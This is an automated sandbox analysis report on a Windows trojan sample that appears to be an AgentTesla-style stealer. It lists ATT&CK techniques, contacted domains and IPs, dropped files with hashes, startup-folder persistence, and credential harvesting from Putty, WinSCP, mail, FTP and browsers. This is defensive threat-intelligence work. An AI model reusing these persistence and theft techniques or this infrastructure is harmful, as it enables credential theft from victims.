                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection                    		Network Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588800 Sample: LfZAz7DQzo.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 30 ip-api.com 2->30 32 ftp.antoniomayol.com 2->32 34 antoniomayol.com 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 10 other signatures 2->46 8 LfZAz7DQzo.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\troopwise.exe, PE32 8->26 dropped 60 Binary is likely a compiled AutoIt script file 8->60 14 troopwise.exe 2 8->14         started        62 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->62 18 troopwise.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\troopwise.vbs, data 14->28 dropped 64 Multi AV Scanner detection for dropped file 14->64 66 Binary is likely a compiled AutoIt script file 14->66 68 Machine Learning detection for dropped file 14->68 74 3 other signatures 14->74 20 RegSvcs.exe 15 2 14->20         started        70 Writes to foreign memory regions 18->70 72 Maps a DLL or memory area into another process 18->72 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 antoniomayol.com 162.241.62.63, 21, 48091, 49731 UNIFIEDLAYER-AS-1US United States 20->36 38 ip-api.com 208.95.112.1, 49730, 49732, 80 TUT-ASUS United States 20->38 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->48 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->50 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->52 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal ftp login credentials 24->56 58 Tries to harvest and steal browser information (history, passwords, etc) 24->58 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    LfZAz7DQzo.exe71%ReversingLabsWin32.Trojan.AutoitInject
                    LfZAz7DQzo.exe62%VirustotalBrowse
                    LfZAz7DQzo.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\seskin\troopwise.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\seskin\troopwise.exe71%ReversingLabsWin32.Trojan.AutoitInject
                    C:\Users\user\AppData\Local\seskin\troopwise.exe62%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    antoniomayol.com
                    		162.241.62.63
                    		truefalse
                      		high
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high
                        ftp.antoniomayol.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://antoniomayol.comRegSvcs.exe, 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://ftp.antoniomayol.comRegSvcs.exe, 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://account.dyn.com/troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://ip-api.comRegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      208.95.112.1
                                      		ip-api.comUnited States
                                      		53334TUT-ASUSfalse
                                      162.241.62.63
                                      		antoniomayol.comUnited States
                                      		46606UNIFIEDLAYER-AS-1USfalse

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1588800
                                      Start date and time:2025-01-11 05:38:34 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 46s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:10
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:LfZAz7DQzo.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:1e6a8f176a0d7a9bd0321b4c032153f48b244be1584137453bf1afc07ea10157.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 54
                                      • Number of non-executed functions: 283
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      04:39:36AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs
                                      23:39:35API Interceptor10050776x Sleep call for process: RegSvcs.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      208.95.112.1Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      162.241.62.63Order 122001-220 guanzo.exeGet hashmaliciousFormBookBrowse
                                      • www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ip-api.comQ5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      UNIFIEDLAYER-AS-1USzdmZjYqz44.exeGet hashmaliciousAgentTeslaBrowse
                                      • 108.179.234.136
                                      ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 50.87.139.143
                                      iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                      • 192.254.225.136
                                      RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                      • 162.241.62.63
                                      ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                      • 192.254.186.165
                                      28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                      • 162.241.62.63
                                      https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                      • 162.241.149.91
                                      https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                      • 162.241.149.91
                                      Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                      • 108.179.241.236
                                      e4Iw3lwFJ5.exeGet hashmaliciousAgentTeslaBrowse
                                      • 162.241.62.63
                                      TUT-ASUSQ5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\Wauseon

                                      Download File
                                      Process:C:\Users\user\Desktop\LfZAz7DQzo.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):245248
                                      Entropy (8bit):6.753866183433448
                                      Encrypted:false
                                      SSDEEP:6144:teSlS8W3NZpl9tLQWo1H6NNndit5IE3OTKSeLMEKCMyon1bnXQSI:ttlS84NZpl9pQ/1H8G5IE3AKSeLMEKC7
                                      MD5:F185C708CCE65DE39ACC6EFFF18747A7
                                      SHA1:8E95F656A4E19D3D2555344F033C4E0887EB3C6D
                                      SHA-256:E2C29E2230FC596EE4CF3695962BB8568CF3719D63F8231A1220E946CFB3E86F
                                      SHA-512:FB112ED3E8E1EF76BB6377E305807339440D1DCBBB7767D4EEC238DCA892F77F9140D318D68D985EACE4F32276417CBDDF10FB7E2710DBE2EF79775382A2FB8D
                                      Malicious:false
                                      Reputation:low
                                      Preview:z..4Z9LWCJW4..CH.0QWZFQ9.4ZNHK7DK4Y9LWGJW4A5CH20QWZFQ9W4ZNHK.DK4W&.YG.^.`.B....?35qI%[=<)&.'*Z7V8w%/wF4[c!\....f<V3QtCEA.DK4Y9LW..W4.4@HA..1ZFQ9W4ZN.K5E@5R9L.DJW<A5CH20..YFQ.W4Z.KK7D.4Y.LWGHW4E5CH20QW^FQ9W4ZNHk3DK6Y9LWGJU4..CH"0QGZFQ9G4Z^HK7DK4I9LWGJW4A5CH>.RW.FQ9W.YN.N7DK4Y9LWGJW4A5CH20QW^F]9W4ZNHK7DK4Y9LWGJW4A5CH20QWZFQ9W4ZNHK7DK4Y9LWGJW4A5Ch20YWZFQ9W4ZNHK?dK4.9LWGJW4A5CH.D4/.FQ93.YNHk7DK.Z9LUGJW4A5CH20QWZFq9WTt<;9TDK4.<LWG.T4A3CH2.RWZFQ9W4ZNHK7D.4Yyb%"&8WA5OH20QW^FQ;W4Z.KK7DK4Y9LWGJW4.5C.20QWZFQ9W4ZNHK7D..Z9LWGJ.4A5AH70..XF9.V4YNHK6DK2Y9LWGJW4A5CH20QWZFQ9W4ZNHK7DK4Y9LWGJW4A5CH20QWZFL.....u.9u>;>.q.-.7..P.I..U.D., ...:....k"A..4.:s..X...L.<_7I....aYG&I".Cn:"./....{pM...H&.M...'..9An....n....I%g...:..T+&.8I<;"d.U'T1!.2.VZFQ9......."L.caTHTc&9c....eE".....$NHKSDK4+9LW&JW4.5CH]0QW4FQ9)4ZN6K7D.4Y9.WGJ`4A5fH20<WZFu9W4$NHK.9D;..>4.4A5CH...g.+...k.y..r:.'b.o...P.~..7c.X2.&z.s..F../..Nk'Qd..3@3GM07UTV{_r..oJO3AI3]:@jI.....n..h.. ....4.77DK4Y9.WG.W4A..H.0QW.F.9.ZNH..D.4.9...J

                                      C:\Users\user\AppData\Local\Temp\aut1A31.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\LfZAz7DQzo.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):160512
                                      Entropy (8bit):7.924481154071239
                                      Encrypted:false
                                      SSDEEP:3072:8p+k1T9xtPkgjuA4ru1hD8BHyLaW4fODeG4N5plh7xD0ex95gIVf3xf57O:+38+6r5lqa6yN5plh7B95gIVPxf56
                                      MD5:A8DDD34B5C9942942F7D0177B916D8B3
                                      SHA1:311652C99FF72A7A453640EE7AA160A9CAF795CD
                                      SHA-256:440DFD60B1403B34791113A5684F7BCDBF9A86D91E31A08D15AD2EF0765E64E8
                                      SHA-512:69CA39FA007B7FCF63DDEA5BEAF499AF5BB0B96C2957339BB0E421E07D8D5932B5B11EBA17DD432E37542DE61D6CE50E39DBF0553463F4F2F2FACE7BB48D355E
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06.....G.sJ..W...M.*.H.L*5z...9..+T.E.oD..+ ....x..ht....j.....x...?....chPO.F.?..n4.-n{<...yUjoV.]....i[..k...b.f.U.u....A..-f/...!.J."....@.....h...JsL..)Uy...!.Z......5..b.4..@%.E^iE...x.[V....6...Vi..P..).F........) .].x.Ux...........F..xd.;......).d.{..%.i..<.r.4........h.....b.....g5z..y;..........U&......<|.!...%.I..z.........K|......i....?.....x(4.....Q.0...X.........=.fW......[...>..7....7.a....'.....Id.....gX^/+...<...;:..5...KW...2......g<.K.f.&...;t.E....E..M....7....gd...n.G|...#....-.........M..Rg.....U..&2.\.WV..v.L.s...t.T...T.U,ri.....l.Y.C...~d..EL.H..i.`."...W@4....)..&...4....x.......O.<...p.x.'4I._...M<.......Y....k.k.^{....u.......P...)...X.b$...G..rxr.?~.k..l.H|.3..f.z.R.{..<.u..O..i3:..j..u<.San..-...RA..t.3N.....:.....mxt.h...tg=}..!..Q9sM4....U..^_-.Q'.yD.EV.....~....%ui...&..\.mY...4...H..m.\>sL..k.y..o<.L..YL2.Q...u.m`.R..=]:S,.U.....6.^h..5nwU.W..\.o..Vg.....S.W.....}.Q*TI..J.@c.j\...Q.P...iU.L.Q..

                                      C:\Users\user\AppData\Local\Temp\aut1D9C.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\seskin\troopwise.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):160512
                                      Entropy (8bit):7.924481154071239
                                      Encrypted:false
                                      SSDEEP:3072:8p+k1T9xtPkgjuA4ru1hD8BHyLaW4fODeG4N5plh7xD0ex95gIVf3xf57O:+38+6r5lqa6yN5plh7B95gIVPxf56
                                      MD5:A8DDD34B5C9942942F7D0177B916D8B3
                                      SHA1:311652C99FF72A7A453640EE7AA160A9CAF795CD
                                      SHA-256:440DFD60B1403B34791113A5684F7BCDBF9A86D91E31A08D15AD2EF0765E64E8
                                      SHA-512:69CA39FA007B7FCF63DDEA5BEAF499AF5BB0B96C2957339BB0E421E07D8D5932B5B11EBA17DD432E37542DE61D6CE50E39DBF0553463F4F2F2FACE7BB48D355E
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06.....G.sJ..W...M.*.H.L*5z...9..+T.E.oD..+ ....x..ht....j.....x...?....chPO.F.?..n4.-n{<...yUjoV.]....i[..k...b.f.U.u....A..-f/...!.J."....@.....h...JsL..)Uy...!.Z......5..b.4..@%.E^iE...x.[V....6...Vi..P..).F........) .].x.Ux...........F..xd.;......).d.{..%.i..<.r.4........h.....b.....g5z..y;..........U&......<|.!...%.I..z.........K|......i....?.....x(4.....Q.0...X.........=.fW......[...>..7....7.a....'.....Id.....gX^/+...<...;:..5...KW...2......g<.K.f.&...;t.E....E..M....7....gd...n.G|...#....-.........M..Rg.....U..&2.\.WV..v.L.s...t.T...T.U,ri.....l.Y.C...~d..EL.H..i.`."...W@4....)..&...4....x.......O.<...p.x.'4I._...M<.......Y....k.k.^{....u.......P...)...X.b$...G..rxr.?~.k..l.H|.3..f.z.R.{..<.u..O..i3:..j..u<.San..-...RA..t.3N.....:.....mxt.h...tg=}..!..Q9sM4....U..^_-.Q'.yD.EV.....~....%ui...&..\.mY...4...H..m.\>sL..k.y..o<.L..YL2.Q...u.m`.R..=]:S,.U.....6.^h..5nwU.W..\.o..Vg.....S.W.....}.Q*TI..J.@c.j\...Q.P...iU.L.Q..

                                      C:\Users\user\AppData\Local\Temp\aut5100.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\seskin\troopwise.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):160512
                                      Entropy (8bit):7.924481154071239
                                      Encrypted:false
                                      SSDEEP:3072:8p+k1T9xtPkgjuA4ru1hD8BHyLaW4fODeG4N5plh7xD0ex95gIVf3xf57O:+38+6r5lqa6yN5plh7B95gIVPxf56
                                      MD5:A8DDD34B5C9942942F7D0177B916D8B3
                                      SHA1:311652C99FF72A7A453640EE7AA160A9CAF795CD
                                      SHA-256:440DFD60B1403B34791113A5684F7BCDBF9A86D91E31A08D15AD2EF0765E64E8
                                      SHA-512:69CA39FA007B7FCF63DDEA5BEAF499AF5BB0B96C2957339BB0E421E07D8D5932B5B11EBA17DD432E37542DE61D6CE50E39DBF0553463F4F2F2FACE7BB48D355E
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06.....G.sJ..W...M.*.H.L*5z...9..+T.E.oD..+ ....x..ht....j.....x...?....chPO.F.?..n4.-n{<...yUjoV.]....i[..k...b.f.U.u....A..-f/...!.J."....@.....h...JsL..)Uy...!.Z......5..b.4..@%.E^iE...x.[V....6...Vi..P..).F........) .].x.Ux...........F..xd.;......).d.{..%.i..<.r.4........h.....b.....g5z..y;..........U&......<|.!...%.I..z.........K|......i....?.....x(4.....Q.0...X.........=.fW......[...>..7....7.a....'.....Id.....gX^/+...<...;:..5...KW...2......g<.K.f.&...;t.E....E..M....7....gd...n.G|...#....-.........M..Rg.....U..&2.\.WV..v.L.s...t.T...T.U,ri.....l.Y.C...~d..EL.H..i.`."...W@4....)..&...4....x.......O.<...p.x.'4I._...M<.......Y....k.k.^{....u.......P...)...X.b$...G..rxr.?~.k..l.H|.3..f.z.R.{..<.u..O..i3:..j..u<.San..-...RA..t.3N.....:.....mxt.h...tg=}..!..Q9sM4....U..^_-.Q'.yD.EV.....~....%ui...&..\.mY...4...H..m.\>sL..k.y..o<.L..YL2.Q...u.m`.R..=]:S,.U.....6.^h..5nwU.W..\.o..Vg.....S.W.....}.Q*TI..J.@c.j\...Q.P...iU.L.Q..

                                      C:\Users\user\AppData\Local\seskin\troopwise.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\LfZAz7DQzo.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):615936
                                      Entropy (8bit):7.935089786585949
                                      Encrypted:false
                                      SSDEEP:12288:0YV6MorX7qzuC3QHO9FQVHPF51jgckYY8bj8LfBmQdGFjZUBdYay3X8F:zBXu9HGaVHjY8n8LeWdzy3c
                                      MD5:79129CF9382F91AB74A895CD2C5A0C7F
                                      SHA1:E1590B1A5AB3212DD35732AFFFFB68236A2CA8B2
                                      SHA-256:1E6A8F176A0D7A9BD0321B4C032153F48B244BE1584137453BF1AFC07EA10157
                                      SHA-512:27A07FEAA25F9AEF7E62292A92197FFCC33A98200B21C26227AFE6D0FFB658257846257321828AFD332DFE360713C45462C2C65F940331CB9A33C581111E2807
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      • Antivirus: Virustotal, Detection: 62%, Browse
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...'Mjg.........."......p..........p.... ........@.......................................@...@.......@.....................h...$.......h...........................................................T...H...........................................UPX0....................................UPX1.....p... ...d..................@....rsrc................h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs

                                      Download File
                                      Process:C:\Users\user\AppData\Local\seskin\troopwise.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):272
                                      Entropy (8bit):3.4014609375378653
                                      Encrypted:false
                                      SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1WlAM8KsoBnriIM8lfQVn:DsO+vNloRKQ1jFHUmA2n
